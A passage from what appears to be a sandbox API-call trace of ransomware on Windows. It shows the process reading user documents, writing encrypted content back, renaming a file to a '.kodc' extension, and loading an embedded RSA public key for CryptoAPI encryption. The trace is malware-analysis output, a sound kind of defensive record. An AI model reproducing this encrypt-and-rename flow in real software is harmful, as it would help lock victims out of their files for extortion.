Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0098.293] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0098.293] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.293] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0098.293] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.293] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.293] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x6a10) returned 0x9ba4d90 [0098.293] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0098.293] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0098.293] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0098.293] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.293] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0098.293] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0098.293] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9cf40 [0098.293] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a928 [0098.293] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9cf88 [0098.293] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a940 [0098.294] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a970 [0098.294] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0098.294] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a988 [0098.294] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0098.294] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0098.294] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32d0958 [0098.294] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333a888 [0098.294] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a970 | out: hHeap=0x630000) returned 1 [0098.294] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a988 | out: hHeap=0x630000) returned 1 [0098.294] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0098.294] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0098.294] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0098.294] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0098.294] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec90 [0098.294] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a988 [0098.294] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0098.294] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331a970 [0098.294] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec40 [0098.294] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c540 [0098.294] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0098.294] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0098.294] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0098.294] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c658 [0098.294] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0098.294] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0098.294] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0098.294] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a988 | out: hHeap=0x630000) returned 1 [0098.294] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0098.294] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a970 | out: hHeap=0x630000) returned 1 [0098.294] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0098.295] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0098.295] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0098.295] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0098.295] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0098.295] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0098.295] GetCurrentThreadId () returned 0x42c [0098.295] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0098.295] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9b8e9c8 [0098.295] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0098.295] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x692d18 [0098.295] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0098.295] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0098.295] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0098.295] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0098.295] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.295] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.295] GetCurrentThreadId () returned 0x42c [0098.295] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.295] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.295] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0098.295] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.295] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.295] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.295] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.295] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0098.295] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0098.295] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0098.295] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x3318ea0 [0098.295] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0098.295] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0098.296] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0098.296] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0098.296] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0098.296] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0098.296] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0098.296] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0098.296] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0098.296] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0098.296] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0098.296] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0098.296] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a970 [0098.296] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0098.296] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec60 [0098.296] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0098.296] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0098.296] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0098.296] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0098.296] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0098.296] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a988 [0098.296] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0098.296] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0098.296] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0098.296] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a958 [0098.296] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0098.296] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0098.296] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0098.296] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0098.296] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0098.296] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0098.296] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0098.296] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a9a0 [0098.296] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0098.296] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a538 [0098.296] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0098.297] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec80 [0098.297] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0098.297] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0098.298] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0098.298] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0098.298] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a970 | out: hHeap=0x630000) returned 1 [0098.298] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a970 [0098.298] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0098.298] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0098.298] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0098.298] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c540 [0098.298] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0098.299] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32d0958 [0098.299] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0098.299] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c770 [0098.299] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0098.299] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c428 [0098.299] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a970 | out: hHeap=0x630000) returned 1 [0098.299] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x32cef08 [0098.299] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0098.299] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0098.299] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0098.299] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x692d18 | out: hHeap=0x630000) returned 1 [0098.299] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0098.299] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0098.299] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0098.299] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0098.300] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0098.300] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0098.300] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0098.300] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0098.300] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a9a0 | out: hHeap=0x630000) returned 1 [0098.300] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0098.300] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0098.300] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0098.300] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a988 | out: hHeap=0x630000) returned 1 [0098.300] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a958 | out: hHeap=0x630000) returned 1 [0098.300] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0098.300] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0098.300] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0098.300] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a940 | out: hHeap=0x630000) returned 1 [0098.300] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9cf88 | out: hHeap=0x630000) returned 1 [0098.300] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0098.300] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0098.300] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318ea0 | out: hHeap=0x630000) returned 1 [0098.300] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0098.300] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0098.300] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0098.300] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0098.300] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0098.300] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0098.300] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0098.300] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0098.300] WriteFile (in: hFile=0x5cc, lpBuffer=0x9ba4d90*, nNumberOfBytesToWrite=0x6a0f, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9ba4d90*, lpNumberOfBytesWritten=0x9e2fb14*=0x6a0f, lpOverlapped=0x0) returned 1 [0098.301] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba4d90 | out: hHeap=0x630000) returned 1 [0098.301] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x6a14, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.301] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0098.301] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0098.301] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0098.301] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x333a888 [0098.301] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x333a888, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0098.301] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x333b018 [0098.301] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0098.301] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0098.301] WriteFile (in: hFile=0x5cc, lpBuffer=0x333b018*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x333b018*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0098.301] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0098.301] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0098.301] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0098.301] CloseHandle (hObject=0x5cc) returned 1 [0098.302] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x692d18 [0098.302] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x890) returned 0x32d0db8 [0098.302] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x692d18 | out: hHeap=0x630000) returned 1 [0098.302] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\gqgz7 KyiyA9wCH9lS.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gqgz7 kyiya9wch9ls.odt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\gqgz7 KyiyA9wCH9lS.odt.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gqgz7 kyiya9wch9ls.odt.kodc")) returned 1 [0098.303] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0098.303] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.303] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.304] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c0 | out: hHeap=0x630000) returned 1 [0098.305] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1de4c20, ftCreationTime.dwHighDateTime=0x1d5bc57, ftLastAccessTime.dwLowDateTime=0x9ac7360, ftLastAccessTime.dwHighDateTime=0x1d5c0e8, ftLastWriteTime.dwLowDateTime=0x9ac7360, ftLastWriteTime.dwHighDateTime=0x1d5c0e8, nFileSizeHigh=0x0, nFileSizeLow=0x1575c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gUfYt.pptx", cAlternateFileName="GUFYT~1.PPT")) returned 1 [0098.305] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0098.305] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8e) returned 0x65e7c0 [0098.305] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0098.305] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\gUfYt.pptx") returned=".pptx" [0098.305] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\gUfYt.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gufyt.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0098.305] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=87900) returned 1 [0098.305] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0098.308] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x15736, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.308] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0098.309] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.309] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.309] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.309] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x1575c, lpOverlapped=0x0) returned 1 [0098.310] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.310] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0098.310] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.310] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.310] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x692d18) returned 1 [0098.311] CryptCreateHash (in: hProv=0x692d18, Algid=0x8003, hKey=0x0, dwFlags=0x0, 